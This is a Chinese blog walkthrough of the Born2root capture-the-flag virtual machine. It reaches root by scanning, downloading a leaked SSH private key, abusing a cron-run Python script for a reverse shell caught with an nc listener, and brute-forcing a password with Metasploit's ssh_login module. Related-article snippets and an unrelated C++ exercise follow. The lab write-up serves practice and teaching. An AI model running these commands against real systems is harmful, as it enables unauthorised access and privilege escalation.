Born2root-SSH服务渗透

最新推荐文章于 2023-08-06 13:07:40 发布
最新推荐文章于 2023-08-06 13:07:40 发布
阅读量1.2k 收藏 3
点赞数
分类专栏: Web漏洞利用 文章标签: 信息安全 ssh 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45007073/article/details/112074985
版权

准备工作

  1. 先下载Born2root镜像并导入虚拟机,注意:本人将ova导入vmware时报了这个错误:
    在这里插入图片描述
  • 原因是OVFtools不兼容的问题,导入virtualbox解决问题!
    在这里插入图片描述

2.安装好kali攻击机,这个自行官网下载,这里不再赘述。

漏洞复现过程

  1. 使用netdiscover命令发现存活主机。
netdiscover -i eth0

发现目标主机

  • 发现目标主机,开始展开攻击!
  1. 首先使用nmap对目标主机进行信息收集。
nmap -sV 192.168.101.31

在这里插入图片描述

  • 发现目标主机开放了ssh端口和一些网络服务。有可能存在ssh私钥泄露等问题,进一步进行渗透。
  1. 使用浏览器登录,进一步进行信息收集。
    在这里插入图片描述
  • 发现了一些有用的信息,可能是目标主机的一个账户。
  1. 使用dirb工具进行WEB目录扫描,更加深入地进行信息挖掘。
dirb http://192.168.101.31/

在这里插入图片描述

  • 发掘到一些目录信息,并尝试能不能从中找到flag信息。

  • 首先先查找robots.txt文件,但是并没有发现有价值的信息。
    在这里插入图片描述

  • 最后打开http://192.168.101.31/icons/,发现出现了目录遍历。
    在这里插入图片描述

  • 打开VDSoyuAXiO.txt文件,发现了ssh的私钥加密信息。
    在这里插入图片描述

  1. 在命令行使用wget命令将这文件下载到桌面,并重命名为id_rsa。
wget http://192.168.101.31/icons/VDSoyuAXiO.txt

在这里插入图片描述

  1. 将id_rsa权限更改为600
chmod 600 id_rsa
  1. 然后使用该私钥尝试登陆目标系统。
ssh -i id_rsa martin@192.168.101.31

在这里插入图片描述

  • 成功登陆目标系统,但是发现martin账户并不属于root用户组,无法提权。

  • 然后再进一步查看/etc/passwd目录,收集账户信息。
    在这里插入图片描述

  • 进入home目录后发现共有三个用户,可能可以提权。

  • 再查看/etc/crontab上系统执行的周期性任务。发现jimmy账户每隔五分钟执行一遍sekurity.py文件。因此可以尝试编写py脚本反弹shell。
    在这里插入图片描述

  • 赋予脚本文件可执行的权限
    在这里插入图片描述

  1. 使用nc侦听端口,并反弹shell
nc -lvp 4444

在这里插入图片描述

  • 发现jimmy用户也不属于root用户组,提权失败。最后剩下hadi账户。

  1. hadi账户只能通过ssh口令暴力破解获取其登录密钥。
    在网上搜猜密码,并生成一个hadi.txt密码字典,保存在桌面即可。我使用过cupp生成,但是并不能成功破解,读者可以自行选择。

  2. 启动msfconsole,并加载相应模块进行漏洞利用。

msfconsole
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.101.31
set username hadi
set pass_file /root/Desktop/hadi.txt
set threads 5
set verbose true
run
  • 等待一段时间发现密码是hadi123。尝试登陆
sessions -i 1
  • 在空白处键入该命令,获取shell字符页面
python -c "import pty; pty.spawn('/bin/bash')"
  1. 尝试提权,密码为hadi123
su - root
  • 提权成功
    在这里插入图片描述
  1. 查看flag在这里插入图片描述
平凡的学者
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
CTF-SSH服务渗透
IT小学子的博客
05-02 724
CTF-SSH服务渗透信息探测对于SSH服务的22端口的靶场面对HTTP服务80端口开放的端口或者其他端口的靶场挖掘敏感信息对ssh密钥进行利用查看根目录文件寻找flagshell 监听暴力破解 信息探测 探测靶场开放的服务服务的版本 nmap -sV ip地址 探测靶场全部信息 nmap -A -v IP地址 nmap -v -n -A www.baidu.com 探测靶场的操作系统类型与版...
CTF练习:SSH服务渗透root主机
qq_43233085的博客
11-14 1864
CTF练习:SSH服务渗透root主机环境准备信息收集进入靶机背水一战 靶机地址: 链接:https://pan.baidu.com/s/1DI6yPW1ePTsT1U9mqgVZTw 提取码:lwr0 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172.19.75.213 查看靶机的IP,为172.19.75.198 ne...
CTF-6.SSH服务渗透
woo233的博客
09-12 1245
SSH为Secure Shell的缩写,由IETF的网络小组(Network Working Group)所制定;SSH为建立在应用层基础上的安全协议。SSH是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用ssH协议可以有效防止远程管理过程中的信息泄露问题。基于TCP 22号端口的服务。在对SSH服务渗透中,大部分情况是利用获取的私钥文件,直接使用用户名和私钥文件登录靶场机器,个别情况进行暴力破解获取用户密码,通过用户名和对应用户登录靶场机器。CTF中要特别注意。
CTF2-SSH服务渗透
最新发布
weixin_52132147的博客
08-06 178
在对SSH服务渗透中,大部分情况是利用获取的私钥文件,直接使用用户名和私钥文件登录靶场机器,个别情况进行暴力破解获取用户密码,通过用户名和对应用户登录靶场机器。在CTF中要特别注意 /tmp 数据缓冲目录以及 /etc/crontab 设置定时执行的文件。
PGP: Born2Root
m0_57221101的博客
05-16 293
Generally , This target seems really easy . It is like a personal PC pentest but unfortunately I had never to think about how to attack a personal PC . And the author likes set rabbit hole very much . Scan It opened three ports 22,80,111 Without 111 ,
born-again-neural-network
05-17
去做: 复制纸张 广域网 密集网 在imageNet中测试
Newborn-Risk-of-Sepsis-calculator:新生儿败血症风险计算器
07-04
Meteor-EOS 这个交互式计算器通过输入每个孕产妇风险因素的值来计算每 1000 名婴儿的早发性感染概率。 该计算器基于 Karen M. Puopolo, MD, PhD, David Draper, PhD, Soora Wi, MPH, Thomas B....
Born-to-code
03-28
我要赞迪
Born in Death - Nora Roberts.mobi
12-26
Born in Death - Nora Roberts.mobi
SSH服务渗透测试
小锤队长的博客
10-05 3258
目录 一,ssh私钥泄露 充电站: 二,ssh 服务测试(暴力破解) 充电站: 一,ssh私钥泄露 靶场:192.168.11.166 1,信息嗅探 对于一个给定的ip得知的靶场机器,我们需要用对其进行扫描,探测开放的服务。(渗透其实是针对服务的漏洞进行探测,然后对应的数据包发送,获取机器的最高权限) nmap -sV 192.168.11.166 //挖掘开放服务...
CTF训练笔记- SSH渗透root主机
llrraa2010的专栏
03-11 364
如果虚拟机网络桥接在WiFi接口上,虚拟机是用DHCP的,那么就会跟WiFi接口同一个网段。用nmap 扫描网段获得IP,或者单机模式进入虚拟机查看IP。修改网络设置重启即可恢复正常。但是错误信息会一直保留在界面上,不要被误导以为还有问题。
CTF-SSH 服务渗透综述
su__xiaoyan的博客
12-15 555
SSH协议简介: SSH为Secure Shell的缩写,是建立在应用层基础上的安全协议;SSH是目前较为可靠,专为远程登录会话和其他网络服务提供安全性的协议,利用SSH协议可以有效的防止远程管理过程中的信息泄露问题。 SSH客户端适用于多种平台,几乎所有的UNIX平台都可以运行SSH。基于TCP的22端口。 SSH协议的认证机制: ssh服务以非对称加密的方式实现身份验证 ssh协议的认证机制分为两种形式:基于密码的安全验证 基于秘钥的安全验证 基于密码的安全验证: 客户端发送登录请求 服务
我要偷偷的学渗透,然后惊讶所有人(ssh服务渗透)
qq_20765511的博客
03-10 4639
准备需要的靶机 这次也是ssh服务的靶机,有需要或者感兴趣的家人们可以私信我,放心没有什么广告收费什么的,都是免费的 kali IP 192.168.43.105 靶机 IP:192.168.43.59 我之前的文章有怎么教获取靶机的IP 渗透第一步,先扫描信息 这里使用 nmap -sV IP 开放的服务服务信息 nmap -sV 192.168.43.59 这里开放了三个端口,其中有80端口,可以去看看网址上有什么信息 这里可以看到这可能是用户名,可以先记着 随后在来深入的扫描一下 dirb
ssh--渗透
qq_49694748的博客
01-09 2303
SSH 为 Secure Shell的缩写,SSH 为建立在应用层基础上的安全协议。SSH 是较可靠,专为远程登录会话和其他网络服务提供安全性的协议 从客户端来看,SSH提供两种级别的安全验证 第一种级别(基于口令的安全验证) 第二种级别(基于密匙的安全验证) SSH配置文件位置:/etc/ssh/sshd_config SSH对应服务名称:sshd .ssh目录存在于用户的根目录 1、 sshsshd的区别 2、 ssh常用配置参数 3、 信息收集-nmap 4、 ss.
SSH服务渗透测试利用指北
systemino的博客
06-30 1715
0x01 SSH和SFTP是什么 SSH是一种安全的远程shell协议,用于通过不安全的网络安全地运行网络服务。默认的SSH端口是22,通常会在Internet或Intranet上的服务器上看到它的打开状态。 SFTP是SSH文件传输协议,该协议用于通过SSH连接传输文件,大多数SSH实现也支持SFTP。 0x02 SSH服务器/库 最著名和最常见的SSH服务器和客户端是openSSH(OpenBSD安全shell)。它是一个功能强大的实现,维护良好,于1999年首次发布。因此,这是自Windows
Vulnhub靶机--born2root
Tauil的博客
08-08 849
访问该网页发现了一个rsa私钥,刚进入网页时得到了一个用户名@网络地址格式,是在暗示我们登陆这个用户,所以输入命令。但是jimmy也没有root权限,那么最后一个用户habi只能使用暴力破解ssh登录了,在。为使用该文件登陆martin用户,需要先给文件读写授权再使用ssh连接。查看是否有对应版本的脚本,没有对应版本,那么应该不是这个端口的问题。执行,但是发现该靶机禁止一切用户打开任何端口,所有导致脚本运行失败。发现与其他不同的是靶机开启了111端口,使用命令。三个用户,在使用命令。进行爆破,获得密码为。.
CTF训练笔记(二)- SSH渗透root主机
morrino的博客
01-10 3073
在对SSH服务渗透中,大部分情况是利用获取的私钥文件,直接使用用户名和私钥文件登录靶机,偶尔可能还需要暴力破解密码。 CTF中要特别注意: /tmp 数据缓存目录; /etc/crontab 定时任务文件。 [CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
渗透&&探测 (之SSH密码暴破)
weixin_34294649的博客
09-30 901
什么是SSH?   简单说,SSH是一种 网络协议,用于计算机之间的 加密登录。   如果一个用户从本地计算机,使用SSH协议 登录 另一台远程计算机,我们就可以认为,这种登录是 安全 的,即使 被中途截获,密码也 不会泄露。   最早的时候,互联网通信都是 明文通信,一旦被截获,内容就 暴露无疑。1995年,芬兰学者Tatu Ylonen设计了SSH协议,将登录信息 全部加密,成为互联网安全的一...
【题目描述】 输入一行单词序列,相邻单词之间由1个或多个空格间隔,请对应地计算各个单词的长度。 注意:如果有标点符号(如连字符,逗号),标点符号算作与之相连的词的一部分。没有被空格间开的符号串,都算作单词。 【输入】 一行单词序列,最少1个单词,最多300个单词,单词之间用至少1个空格间隔。单词序列总长度不超过1000。 【输出】 依次输出对应单词的长度,之间以逗号间隔。 【输入样例】 She was born in 1990-01-02 and from Beijing city. 【输出样例】 3,3,4,2,10,3,4,7,5 c++代码
05-22
```cpp #include <iostream> #include <string> using namespace std; int main() { string s; getline(cin, s); // 读入整行字符串 int len = s.length(); int start = 0; // 当前单词的起始位置 for (int i = 0; i < len; i++) { if (s[i] == ' ' || i == len - 1) { // 找到一个单词的结尾 int wordLen = i - start + 1; if (i == len - 1 && s[i] != ' ') wordLen++; // 特判最后一个单词 cout << wordLen - 1 << ','; // 输出单词长度 start = i + 1; // 更新下一个单词的起始位置 } } return 0; } ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值